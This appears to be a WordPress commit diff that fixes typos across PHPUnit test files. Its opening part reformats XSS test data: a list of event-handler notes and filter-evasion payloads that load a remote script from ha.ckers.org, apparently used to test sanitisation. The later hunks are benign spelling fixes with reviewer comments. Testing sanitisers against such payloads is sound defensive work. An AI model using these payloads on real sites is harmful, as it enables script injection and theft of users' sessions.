</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSeek() (fires when the timeline is set to play in any direction other than forward)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onStart() (fires at the beginning of each marquee loop)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onStop() (user would need to press the stop button or leave the webpage)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onSubmit() (requires attacker or user submits a form)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onTimeError() (fires when user or attacker sets a time property, such as "dur", to an invalid value)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onTrackChange() (fires when user or attacker changes track in a playList)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onUnload() (fires when the user clicks any link or presses the back button or attacker forces a click)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -onURLFlip() (fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
</ins><span class="cx" style="display: block; padding: 0 10px"> -seekSegmentTime() (locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-</desc>
- <label>Event Handlers</label>
- <browser>Browser support:</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 1</name>
- <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+</desc>
+ <label>Event Handlers</label>
+ <browser>Browser support:</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 1</name>
+ <code><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of the following regex filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script[^>]+src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 2</name>
- <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script[^>]+src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 2</name>
+ <code><SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter:
</span><span class="cx" style="display: block; padding: 0 10px"> /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-
-(this is an important one, because I've seen this regex in the wild)</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 3</name>
- <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+
+(this is an important one, because I've seen this regex in the wild)</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 3</name>
+ <code><SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Another XSS to evade this regex filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 4</name>
- <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 4</name>
+ <code><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>Yet another XSS to evade the same filter:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
-The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Evade Regex Filter 5</name>
- <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i
+The only thing I've seen work against this XSS attack if you still want to allow <SCRIPT> tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags)</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Evade Regex Filter 5</name>
+ <code><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
</ins><span class="cx" style="display: block; padding: 0 10px"> <desc>And one last XSS attack (using grave accents) to evade this regex:
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Filter Evasion 1</name>
- <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>Filter Evasion 2</name>
- <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
- <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
- <label>XSS w/HTML Quote Encapsulation</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
</ins><span class="cx" style="display: block; padding: 0 10px"> </attack>
</span><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ <attack>
+ <name>Filter Evasion 1</name>
+ <code><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
+ <attack>
+ <name>Filter Evasion 2</name>
+ <code><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></code>
+ <desc>Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
+ <label>XSS w/HTML Quote Encapsulation</label>
+ <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
+ </attack>
</ins><span class="cx" style="display: block; padding: 0 10px"> </xss>
</span></span></pre></div>
<a id="trunktestsphpunitincludesabstracttestcasephp"></a>
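--- a/trunk/tests/phpunit/includes/abstract-testcase.php
+++ b/trunk/tests/phpunit/includes/abstract-testcase.php
@@ -1642,7 +1642,7 @@
 /**
 * Touches the given file and its directory if it doesn't already exist.
 *
- * This can be used to ensure a file that is implictly relied on in a test exists
+ * This can be used to ensure a file that is implicitly relied on in a test exists
 * without it having to be built.
 *
 * @param string $file The file name.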
<a id="trunktestsphpunitincludesfactoryclasswpunittestfactoryforthingphp"></a>
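--- a/trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php
+++ b/trunk/tests/phpunit/includes/factory/class-wp-unittest-factory-for-thing.php
@@ -155,7 +155,7 @@
 * @param array|null $callbacks Optional. Array with callbacks to apply on the fields.
 * Default null.
 *
- * @return array|WP_Error Combined array on success. WP_Error when default value is incorrent.
+ * @return array|WP_Error Combined array on success. WP_Error when default value is incorrect.
 */
 public function generate_args( $args = array(), $generation_definitions = null, &$callbacks = null ) {
 $callbacks = array();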
<a id="trunktestsphpunitincludesnormalizexmlxsl"></a>
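--- a/trunk/tests/phpunit/includes/normalize-xml.xsl
+++ b/trunk/tests/phpunit/includes/normalize-xml.xsl
@@ -3,7 +3,7 @@
 Normalize an XML document to make it easier to compare whether 2 documents will
 be seen as "equal" to an XML processor.
 
- The normalization is similiar, in spirit, to {@link https://www.w3.org/TR/xml-c14n11/ Canonical XML},
+ The normalization is similar, in spirit, to {@link https://www.w3.org/TR/xml-c14n11/ Canonical XML},
 but without some aspects of C14N that make the kinds of assertions we need difficult.
 
 For example, the following XML documents will be interpreted the same by an XML processor,
@@ -23,7 +23,7 @@
 >
 
 <!--
- Output UTF-8 XML, no indendation and all CDATA sections replaced with their character content.
+ Output UTF-8 XML, no indentation and all CDATA sections replaced with their character content.
 -->
 <xsl:output
 method='xml'
@@ -61,12 +61,12 @@
 </xsl:template>
 
 <!--
- Strip comments.
+ Strip comments.
 -->
 <xsl:template match='comment()' priority='10' />
 
 <!--
- Pass all other nodes through unchanged.
+ Pass all other nodes through unchanged.
 -->
 <xsl:template match='node()'>
 <xsl:copy>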
<a id="trunktestsphpunitincludestestcaseajaxphp"></a>
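--- a/trunk/tests/phpunit/includes/testcase-ajax.php
+++ b/trunk/tests/phpunit/includes/testcase-ajax.php
@@ -133,7 +133,7 @@
 /**
 * Sets up the test fixture.
 *
- * Overrides wp_die(), pretends to be Ajax, and suppresses E_WARNINGs.
+ * Overrides wp_die(), pretends to be Ajax, and suppresses warnings.
 */
 public function set_up() {
 parent::set_up();
@@ -161,7 +161,7 @@
 $_GET = array();
 unset( $GLOBALS['post'] );
 unset( $GLOBALS['comment'] );
- remove_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1, 1 );
+ remove_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1 );
 remove_action( 'clear_auth_cookie', array( $this, 'logout' ) );
 error_reporting( $this->_error_level );
 set_current_screen( 'front' );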
<a id="trunktestsphpunittestsactionsphp"></a>
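--- a/trunk/tests/phpunit/tests/actions.php
+++ b/trunk/tests/phpunit/tests/actions.php
@@ -613,7 +613,7 @@
 /**
 * @ticket 17817
 *
- * This specificaly addresses the concern raised at
+ * This specifically addresses the concern raised at
 * https://core.trac.wordpress.org/ticket/17817#comment:52
 *
 * @covers ::remove_filter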
<a id="trunktestsphpunittestsajaxwpAjaxParseMediaShortcodephp"></a>
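--- a/trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php
+++ b/trunk/tests/phpunit/tests/ajax/wpAjaxParseMediaShortcode.php
@@ -42,7 +42,7 @@
 
 $_POST = array_merge(
 array(
- 'action' => 'paser-media-shortcode',
+ 'action' => 'parse-media-shortcode',
 'type' => '',
 ),
 $payload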
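Review bot: The misspelled `'action' => 'paser-media-shortcode'` in the `$_POST` defaults survived until a typo sweep, which suggests that nothing in this test depends on `$_POST['action']`, so the corrected value is just as unverified as the old one. The enclosing method starts and ends outside the hunk, and the handler is presumably selected by name elsewhere in it. If the key is only there to mirror a real request, say so above the array, e.g. `// 'action' mirrors a real request; it does not select the handler in this test.`, or drop it from the defaults so a future mismatch cannot hide.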
<a id="trunktestsphpunittestsajaxwpAjaxResponsephp"></a>
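--- a/trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php
+++ b/trunk/tests/phpunit/tests/ajax/wpAjaxResponse.php
@@ -21,7 +21,7 @@
 
 /**
 * Set up the test fixture.
- * Override wp_die(), pretend to be ajax, and suppres E_WARNINGs
+ * Override wp_die(), pretend to be ajax, and suppress warnings.
 */
 public function set_up() {
 parent::set_up();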
<a id="trunktestsphpunittestsauthphp"></a>
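--- a/trunk/tests/phpunit/tests/auth.php
+++ b/trunk/tests/phpunit/tests/auth.php
@@ -149,8 +149,8 @@
 $password = "pass with new line \n";
 $this->assertTrue( wp_check_password( 'pass with new line', wp_hash_password( $password ) ) );
 
- $password = "pass with vertial tab o_O\x0B";
- $this->assertTrue( wp_check_password( 'pass with vertial tab o_O', wp_hash_password( $password ) ) );
+ $password = "pass with vertical tab o_O\x0B";
+ $this->assertTrue( wp_check_password( 'pass with vertical tab o_O', wp_hash_password( $password ) ) );
 }
 
 /**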
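Review bot: The assertions in this hunk expect a password to verify without its trailing `\n` or `\x0B`, but no visible comment says why, so the expected value reads like a test mistake. A one-line comment above each pair would record the contract, e.g. `// Trailing whitespace and control characters are dropped before hashing, so the trimmed form must verify.` It is worth stating because two distinct inputs are accepted for the same stored hash. Where the trimming happens is not visible here, and the test method starts outside the hunk.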
<a id="trunktestsphpunittestsblocksregisterphp"></a>
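--- a/trunk/tests/phpunit/tests/blocks/register.php
+++ b/trunk/tests/phpunit/tests/blocks/register.php
@@ -888,7 +888,7 @@
 DIR_TESTDATA . '/blocks/notice',
 array(
 'name' => 'tests/notice-with-overrides',
- 'title' => 'Overriden title',
+ 'title' => 'Overridden title',
 'style' => array( 'tests-notice-style-overridden' ),
 )
 );
@@ -896,7 +896,7 @@
 $this->assertInstanceOf( 'WP_Block_Type', $result, 'The block was not registered' );
 $this->assertSame( 2, $result->api_version, 'The API version is incorrect' );
 $this->assertSame( 'tests/notice-with-overrides', $result->name, 'The block name was not overridden' );
- $this->assertSame( 'Overriden title', $result->title, 'The block title was not overridden' );
+ $this->assertSame( 'Overridden title', $result->title, 'The block title was not overridden' );
 $this->assertSameSets(
 array( 'tests-notice-editor-script' ),
 $result->editor_script_handles,
@@ -937,7 +937,7 @@
 'no block.json file and no name argument' => array(
 'file' => '', // No block.json file.
 'args' => array(
- 'title' => 'Overriden title',
+ 'title' => 'Overridden title',
 'style' => array( 'tests-notice-style-overridden' ),
 ),
 ),
@@ -950,7 +950,7 @@
 // A file that exists but is empty. This will bypass the file_exists() check.
 'file' => DIR_TESTDATA . '/blocks/notice/block.js',
 'args' => array(
- 'title' => 'Overriden title',
+ 'title' => 'Overridden title',
 'style' => array( 'tests-notice-style-overridden' ),
 ),
 ),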
<a id="trunktestsphpunittestsblockssupportedStylesphp"></a>
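--- a/trunk/tests/phpunit/tests/blocks/supportedStyles.php
+++ b/trunk/tests/phpunit/tests/blocks/supportedStyles.php
@@ -169,7 +169,7 @@
 'attrs' => array(
 'textColor' => 'red',
 'backgroundColor' => 'black',
- // The following should not be applied (subcatagories of color support).
+ // The following should not be applied (subcategories of color support).
 'gradient' => 'some-gradient',
 ),
 'innerBlock' => array(),
@@ -203,7 +203,7 @@
 'color' => array(
 'text' => '#000',
 'background' => '#fff',
- // The following should not be applied (subcatagories of color support).
+ // The following should not be applied (subcategories of color support).
 'gradient' => 'some-gradient',
 'style' => array( 'color' => array( 'link' => '#fff' ) ),
 ),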
<a id="trunktestsphpunittestsblockswpBlockTypephp"></a>
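--- a/trunk/tests/phpunit/tests/blocks/wpBlockType.php
+++ b/trunk/tests/phpunit/tests/blocks/wpBlockType.php
@@ -306,7 +306,7 @@
 * @ticket 45097
 */
 public function test_has_block_with_invalid_content() {
- // some content with invalid HMTL comments and a single valid block.
+ // some content with invalid HTML comments and a single valid block.
 $invalid_content = 'before' .
 '<!- - wp:core/weird-space --><!-- /wp:core/weird-space -->' .
 '<!--wp:core/untrimmed-left --><!-- /wp:core/untrimmed -->' .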
<a id="trunktestsphpunittestscachephp"></a>
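--- a/trunk/tests/phpunit/tests/cache.php
+++ b/trunk/tests/phpunit/tests/cache.php
@@ -357,7 +357,7 @@
 $val2 = 'val2';
 
 if ( ! is_multisite() ) {
- // Single site ingnores switch_to_blog().
+ // Single site ignores switch_to_blog().
 $this->assertTrue( $this->cache->set( $key, $val ) );
 $this->assertSame( $val, $this->cache->get( $key ) );
 $this->cache->switch_to_blog( 999 );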
<a id="trunktestsphpunittestscommentgetPageOfCommentphp"></a>
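--- a/trunk/tests/phpunit/tests/comment/getPageOfComment.php
+++ b/trunk/tests/phpunit/tests/comment/getPageOfComment.php
@@ -306,8 +306,8 @@
 $comment_children[ $i ] = $child;
 }
 
- $page_1_indicies = array( 2, 3, 4 );
- $page_2_indicies = array( 0, 1 );
+ $page_1_indices = array( 2, 3, 4 );
+ $page_2_indices = array( 0, 1 );
 
 $args = array(
 'per_page' => 3,
@@ -314,12 +314,12 @@
 'max_depth' => 2,
 );
 
- foreach ( $page_1_indicies as $p1i ) {
+ foreach ( $page_1_indices as $p1i ) {
 $this->assertSame( 1, (int) get_page_of_comment( $comment_parents[ $p1i ], $args ) );
 $this->assertSame( 1, (int) get_page_of_comment( $comment_children[ $p1i ], $args ) );
 }
 
- foreach ( $page_2_indicies as $p2i ) {
+ foreach ( $page_2_indices as $p2i ) {
 $this->assertSame( 2, (int) get_page_of_comment( $comment_parents[ $p2i ], $args ) );
 $this->assertSame( 2, (int) get_page_of_comment( $comment_children[ $p2i ], $args ) );
 }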
<a id="trunktestsphpunittestscronphp"></a>
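--- a/trunk/tests/phpunit/tests/cron.php
+++ b/trunk/tests/phpunit/tests/cron.php
@@ -915,7 +915,7 @@
 
 return new WP_Error(
 'my_error',
- 'An error ocurred'
+ 'An error occurred'
 );
 };
 
@@ -947,7 +947,7 @@
 
 return new WP_Error(
 'my_error',
- 'An error ocurred'
+ 'An error occurred'
 );
 };
 
@@ -1112,7 +1112,7 @@
 
 return new WP_Error(
 'my_error',
- 'An error ocurred'
+ 'An error occurred'
 );
 };
 
@@ -1137,7 +1137,7 @@
 
 return new WP_Error(
 'my_error',
- 'An error ocurred'
+ 'An error occurred'
 );
 };
 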
<a id="trunktestsphpunittestsdbdbDeltaphp"></a>
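--- a/trunk/tests/phpunit/tests/db/dbDelta.php
+++ b/trunk/tests/phpunit/tests/db/dbDelta.php
@@ -735,7 +735,7 @@
 /**
 * @ticket 20263
 */
- public function test_key_and_index_and_fulltext_key_and_fulltext_index_and_unique_key_and_unique_index_indicies() {
+ public function test_key_and_index_and_fulltext_key_and_fulltext_index_and_unique_key_and_unique_index_indices() {
 global $wpdb;
 
 $schema = "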
<a id="trunktestsphpunittestsdbphp"></a>
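--- a/trunk/tests/phpunit/tests/db.php
+++ b/trunk/tests/phpunit/tests/db.php
@@ -573,10 +573,10 @@
 /**
 * Test the `get_col()` method.
 *
- * @param string|null $query The query to run.
- * @param string|array $expected The expected resulting value.
- * @param arrray|string|null $last_result The value to assign to `$wpdb->last_result`.
- * @param int|string $column The column index to retrieve.
+ * @param string|null $query The query to run.
+ * @param string|array $expected The expected resulting value.
+ * @param array|string|null $last_result The value to assign to `$wpdb->last_result`.
+ * @param int|string $column The column index to retrieve.
 *
 * @dataProvider data_get_col
 *
@@ -607,10 +607,10 @@
 * @return array {
 * Arguments for testing `get_col()`.
 *
- * @type string|null $query The query to run.
- * @type string|array $expected The resulting expected value.
- * @type arrray|string|null $last_result The value to assign to `$wpdb->last_result`.
- * @type int|string $column The column index to retrieve.
+ * @type string|null $query The query to run.
+ * @type string|array $expected The resulting expected value.
+ * @type array|string|null $last_result The value to assign to `$wpdb->last_result`.
+ * @type int|string $column The column index to retrieve.
 */
 public function data_get_col() {
 global $wpdb;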
<a id="trunktestsphpunittestsdependenciesstylesphp"></a>
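--- a/trunk/tests/phpunit/tests/dependencies/styles.php
+++ b/trunk/tests/phpunit/tests/dependencies/styles.php
@@ -160,7 +160,7 @@
 }
 
 /**
- * Test if inline styles work with concatination
+ * Test if inline styles work with concatenation
 *
 * @global WP_Styles $wp_styles
 * @ticket 24813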
<a id="trunktestsphpunittestsfiltersphp"></a>
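--- a/trunk/tests/phpunit/tests/filters.php
+++ b/trunk/tests/phpunit/tests/filters.php
@@ -313,7 +313,7 @@
 $this->assertFalse( has_filter( 'all', array( $a, 'filterall' ) ) );
 $this->assertFalse( has_filter( 'all' ) );
 $this->assertSame( $val, apply_filters( $hook_name, $val ) );
- // Call cound should remain at 1.
+ // Call count should remain at 1.
 $this->assertSame( 1, $a->get_call_count() );
 $this->assertSame( array( $hook_name ), $a->get_hook_names() );
 }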
<a id="trunktestsphpunittestsfontsfontlibrarywpRestFontFamiliesControllerphp"></a>
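--- a/trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php
+++ b/trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php
@@ -382,8 +382,8 @@
 $this->assertSame( 201, $response->get_status(), 'The response status should be 201.' );
 $this->check_font_family_data( $data, $data['id'], $response->get_links() );
 
- $reponse_settings = $data['font_family_settings'];
- $this->assertSame( $settings, $reponse_settings, 'The expected settings should exist in the font_family_settings data.' );
+ $response_settings = $data['font_family_settings'];
+ $this->assertSame( $settings, $response_settings, 'The expected settings should exist in the font_family_settings data.' );
 $this->assertEmpty( $data['font_faces'], 'The font_faces should be empty or not exist in the response data.' );
 }
 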
<a id="trunktestsphpunittestsformattingcleanPrephp"></a>
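--- a/trunk/tests/phpunit/tests/formatting/cleanPre.php
+++ b/trunk/tests/phpunit/tests/formatting/cleanPre.php
@@ -1,7 +1,7 @@
 <?php
 
 /**
- * The clean_pre() removes pararaph and line break
+ * The clean_pre() removes paragraph and line break
 * tags within `<pre>` elements as part of wpautop().
 *
 * @group formatting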
<a id="trunktestsphpunittestsformattingconvertSmiliesphp"></a>
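--- a/trunk/tests/phpunit/tests/formatting/convertSmilies.php
+++ b/trunk/tests/phpunit/tests/formatting/convertSmilies.php
@@ -55,8 +55,8 @@
 "<strong;)>a little bit of this\na little bit:other: of that \xf0\x9f\x98\x80\n\xf0\x9f\x98\x80 a little bit of good\nyeah with a little bit of bad8O",
 ),
 array(
- '<strong style="here comes the sun :-D">and I say it\'s allright:D:D',
- '<strong style="here comes the sun :-D">and I say it\'s allright:D:D',
+ '<strong style="here comes the sun :-D">and I say it\'s alright:D:D',
+ '<strong style="here comes the sun :-D">and I say it\'s alright:D:D',
 ),
 array(
 '<!-- Woo-hoo, I\'m a comment, baby! :x > -->',
@@ -254,7 +254,7 @@
 smilies_init();
 }
 
- $orig_trans = $wpsmiliestrans; // Save original tranlations array.
+ $orig_trans = $wpsmiliestrans; // Save original translations array.
 
 $wpsmiliestrans = array(
 ':)' => 'simple-smile.png',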
<a id="trunktestsphpunittestsformattingemojiphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/emoji.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/emoji.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/emoji.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -111,7 +111,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> '🙂',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Bird, ZWJ, black large squre, emoji selector.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Bird, ZWJ, black large square, emoji selector.
</ins><span class="cx" style="display: block; padding: 0 10px"> '🐦⬛',
</span><span class="cx" style="display: block; padding: 0 10px"> '🐦‍⬛',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingescUrlphp"></a>
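--- a/trunk/tests/phpunit/tests/formatting/escUrl.php
+++ b/trunk/tests/phpunit/tests/formatting/escUrl.php
@@ -258,7 +258,7 @@
 *
 * @covers ::sanitize_url
 */
- public function test_invalid_charaters() {
+ public function test_invalid_characters() {
 $this->assertEmpty( sanitize_url( '"^<>{}`' ) );
 }
 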
<a id="trunktestsphpunittestsformattingmakeClickablephp"></a>
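--- a/trunk/tests/phpunit/tests/formatting/makeClickable.php
+++ b/trunk/tests/phpunit/tests/formatting/makeClickable.php
@@ -256,8 +256,8 @@
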